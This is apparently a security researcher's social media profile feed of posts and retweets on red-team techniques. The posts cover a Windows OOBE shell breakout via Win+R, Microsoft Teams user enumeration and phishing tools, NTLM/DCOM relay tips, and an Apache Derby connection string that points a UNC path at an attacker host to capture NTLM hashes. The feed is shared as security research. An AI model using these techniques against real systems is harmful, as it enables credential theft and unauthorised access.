@_bka_ profile picture
Bk @_bka_
Joined July 2016
  • Tweets 219
  • Following 137
  • Followers 261
16 Photos and videos
Bk retweeted
John Hammond
@_JohnHammond
21 Aug 2025
An alternative to Shift F10 to open an administrative command prompt during the Windows initial setup and Out-of-Box-Experience (OOBE) -- video showcase of @_bka_ 's newfound trick to revive a simple method for backdoors and unintended access: youtu.be/idogu3Y6ia8
8
44
288
43,433
Bk@_bka_
12 Aug 2025
The old and well-known way to spawn a shell in Windows OOBE is the Shift F10 hotkey. But did you know there is another way, even when Shift F10 is disabled? You could find more details in the blog post (link in the comment). #infosec #oobe #Intune #Windows
A shell can be spawned in Windows OOBE by using the hotkey Win R

ALT A shell can be spawned in Windows OOBE by using the hotkey Win R

1
2
4
285
Bk@_bka_
12 Aug 2025
Details in blog.kanbach.org/post/window…

Windows OOBE Breakout Revived

IT-Security and stuff - Windows OOBE Breakout Revived

blog.kanbach.org
1
1
205
Bk@_bka_
29 Nov 2024
If you ever find an Apache Derby service running on a Windows machine, try to connect to it by specifying a UNC path as database name and include your address for NTLM relaying. Example connection string: jdbc:derby://<target>:1527/\\attacker\foobar;create=false #redteam

ALT A responder session is running in a window, listening for requests. A port scan is executed against Apache Derby and a version banner is returned, showing that Derby is running. A connection is initiated with Derby, specifying an UNC path as database name, in which the responder ip address is entered. Finally a hash is captured
1
5
238
Bk@_bka_
19 Nov 2024
For what it's worth: bsky.app/profile/bka-sec.bsk…
109
Bk@_bka_
18 Nov 2024
This is very accurate #sccm
125
Bk@_bka_
29 Oct 2024
Nice, thanks for your research! That matches quite well with the login check I wrote some weeks ago: github.com/bka-dev/CmRcAuth

GitHub - bka-dev/CmRcAuth: Access check for Remote Control service (CmRcService.exe) in MECM/SCCM...

Access check for Remote Control service (CmRcService.exe) in MECM/SCCM deployments - bka-dev/CmRcAuth

github.com
Chris Au@netero_1010
21 Oct 2024
Something interesting I found in SCCM remote control. netero1010-securitylab.com/r…
1
2
183
Bk@_bka_
11 Oct 2024
Except if you target ADCS servers due to the "Certificate Service DCOM Access" group and their only member "Authenticated Users" 😄
Andrea P@decoder_it
11 Oct 2024
OK, I promise to stop spamming about relays with NTLM/Kerberos 😅. But if you're a member of the Distributed COM or Performance Log group, these juicy CLSIDs let you trigger remotely machine authentication of any computer, including DCs, and relay DCOM -> HTTP, SMB… 👇
111
Bk@_bka_
2 Oct 2024
Highly recommend this blog post of @nv1t in which he demonstrates how flawed the Kekz headphones are, by reversing the hardware and firmware of this product. #infosec #reverseengineering
nuit - @nv1t@chaos.social@nv1t
2 Oct 2024
I've looked into the Kekz Headphones for children approx a year ago. I finally published the blog post about the crypto of the audio files and how the cookies operate. There is even some customer data disclosure involved. nv1t.github.io/blog/kekz-hea…
121
Bk@_bka_
18 Sep 2024
Ever found the Remote Control service of SCCM/MECM on TCP Port 2701? Turns out there is no easy way to check logins against the service on Linux where you could not use CmRcViewer.exe. So I wrote a script that could do it. It's available on github.com/bka-dev/CmRcAuth #infosec
Open TCP port 2701 of Remote Control in MECM/SCCM deployments

ALT Open TCP port 2701 of Remote Control in MECM/SCCM deployments
3
158
Bk@_bka_
20 Aug 2024
Downloading symbols for .exe files is easy with tools like symchk, Windbg, IDA or Ghidra. But how to do it manually, for example on Linux with only few tools available? First we need the UUID of the PDB and its age. We could use objdump for this:
Objdump can be used to find out the UUID of the PDB symbols.

ALT Objdump can be used to find out the UUID of the PDB symbols.

1
1
130
Bk@_bka_
20 Aug 2024
This is all we need to construct the URL. Name of the PDB (in this example ipconfig.pdb), UUID and age: wget msdl.microsoft.com/download/… Please note that the last digit, 1, behind the UUID corresponds to the age value. That's it, the symbols are going to be downloaded.
83
Bk@_bka_
19 Jul 2024
Did anyone perform patch diffing of csagent.sys yet?
109
Bk@_bka_
24 Feb 2024
Recently I was trying to refresh a MSGraph token to a token for mysignins.microsoft.com, but failed. The original auth code flow uses client_id 19db86c3-b2b9-44cc-b339-36da233a3be2 and scope 0000000c-0000-0000-c000-000000000000/.default openid. Any ideas @424f424f @_dirkjan ?

1
454
Bk@_bka_
24 Feb 2024
I tried it using two methods: 1. Calling the /token endpoint with grant_type refresh_token. It gave me error":"invalid_grant" 2. I tried initiating a device code flow using the client_id and scope that I found in the original browser-based auth code flow. Both did not work
193
Bk@_bka_
5 Sep 2023
My new metasploit module to detect the MSMQ RCE CVE-2023-21554, aka QueueJumper, was just published. Thanks to @chompie1337, @FabiusArtrel and @aaronportnoy for the excellent write-up covering the vulnerability and the ideas for detecting affected hosts github.com/rapid7/metasploit…
3
329
Bk@_bka_
11 Jul 2023
Threading support was added to TeamsEnum today. There don't seem to be any rate-limiting issues so far. Any issues or requests, feel free to contribute. github.com/sse-secure-system…

GitHub - lucidra-security/TeamsEnum: User Enumeration of Microsoft Teams users via API

User Enumeration of Microsoft Teams users via API. Contribute to lucidra-security/TeamsEnum development by creating an account on GitHub.

github.com
1
155
Bk retweeted
Octoberfest7@Octoberfest73
3 Jul 2023
Happy early 4th- TeamsPhisher is out now! Send messages attachments to external Teams users for the purpose of phishing for access. This short project was a fun departure from all of the BOF and Post-ex stuff I typically focus on. github.com/Octoberfest7/Team… #redteam #Malware

GitHub - Octoberfest7/TeamsPhisher: Send phishing messages and attachments to Microsoft Teams users

Send phishing messages and attachments to Microsoft Teams users - Octoberfest7/TeamsPhisher

github.com
7
118
312
42,512
Bk retweeted
Carsten@0xcsandker
17 May 2023
Published my latest Active Directory spotlight on SCCM. /CC: @_Mayyhem , @_nwodtuhs securesystems.de/blog/active…

2
53
131
12,980
Bk@_bka_
4 Apr 2023
User Enumeration via Microsoft Teams could be useful during Red Team exercises and in preparation for phishing campaigns. This is described in my recent blog post. The new tool TeamsEnum could be used to find valid users. securesystems.de/blog/a-fres… #osint #redteam #teams #recon
1
4
423
Load more